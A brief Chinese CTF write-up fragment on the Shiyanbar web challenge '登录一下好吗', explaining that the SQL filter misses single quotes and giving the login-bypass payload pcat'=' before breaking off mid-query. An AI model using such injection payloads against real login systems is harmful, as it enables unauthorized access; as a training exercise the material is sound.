实验吧CTF-web

登录一下好吗 类型:sql注入 已通过滤了/ # -- select or union |等,可是没有过滤单引号php payload:username=pcat'='&password=pcat'='html 原sql语句为:python select * from user where username='用户名' and password='密码' 拼接后为:mysql select * f
相关文章
相关标签/搜索